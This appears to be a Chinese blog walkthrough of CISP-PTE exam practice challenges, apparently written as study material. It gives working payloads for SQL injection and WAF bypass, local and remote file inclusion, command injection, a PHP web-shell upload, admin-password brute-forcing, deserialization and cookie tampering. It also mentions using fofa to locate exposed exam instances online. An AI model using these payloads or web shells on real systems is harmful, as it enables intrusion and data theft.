CISP-PTE 2021-12-20

简介

CISP-PTE考试练习,白嫖题目,使用fofa进行搜索body="CISP-PTE 认证考试"

image-20211220135007512

SQL注入

考点一:二次注入

1、注册账户

image-20211220142043462

2、判断注入

title=1&content=1' and '1'= '1
title=1&content=1' and '1'= '0

image-20211220142206460

image-20211220142252464

3、构建payload

title=1&content=1','a'),('a',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'a          //查询表名
title=1&content=1','a'),('a',(select group_concat(column_name) from information_schema.columns where table_name=0x757365727331),'a    //查询列名
title=1&content=1','a'),('a',(select password from users1 limit 0,1),'a  //查询字段

考点二: waf绕过

image-20211220201429816

1、payload

猜测字段数

?id=1%') order by 7 --+ //正常
?id=1%') order by 8 --+ //页面不正常

联合查询

(1)、测试过滤union,双写绕过

id=-1%') ununionion select 1,2,3,4,5,6,7 --+ 

image-20211220201738481

(2)、包含key,没出来内容(应该是没有放)

id=-1%') ununionion select 1,2,load_file('/tmp/360/key'),4,5,6,7 --+

image-20211220202318704

文件包含

考点一:本地包含

image-20211220135119099

1、访问,file传入view.html值

image-20211220135153749

2、尝试本地包含不行,远程包含也不行

3、访问view.html,发现源码

image-20211220135309906

4、查看代码,需要POST两个值

5、构造payload

Hello=1&z0=c3lzdGVtKCdjYXQgLi4va2V5LnBocCcpOw==

image-20211220135639920

考点二:远程文件包含

image-20211220140019940

1、在自己服务器上构造xx.html

<?php

eval($_POST[1]);
?>

2、payload

1=system('cat ../key.php');

image-20211220140219154

命令执行

考点一:常用命令绕过

image-20211220140301873

1、payload

127.0.0.1&rev ../key.p[a-z]p

image-20211220140917831

文件上传

image-20211220141107389

1、构建一句话木马

GIF89a
<script language='php'>system($_POST[1]);</script>

2、使用bp修改类型

image-20211220141235390

3、查看key.php

image-20211220141331775

日志分析

image-20211220141416726

1、下载日志,在日志中发现adminlogin.php路径

image-20211220141538132

2、访问页面,不知道密码,使用bp进行爆破

image-20211220141622323

3、密码为password123

image-20211220141925627

image-20211220141945900

反序列化漏洞

image-20211220142754815

1、查看源码

image-20211220142802033

2、构建payload

<?php

$a = "CISP-PTE";
echo serialize($a);

?>

image-20211220142919614

image-20211220142944346

逻辑漏洞

image-20211220143009236

1、使用bp进行抓包

image-20211220143023918

image-20211220143116267

2、修改IsAdmin=true;username=admin(base64)

image-20211220143213628

文章作者: weehhd
版权声明: 本站所有文章除特别声明外,均採用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 weehhd
渗透测试
喜欢就支持一下吧
打赏
微信 微信
支付宝 支付宝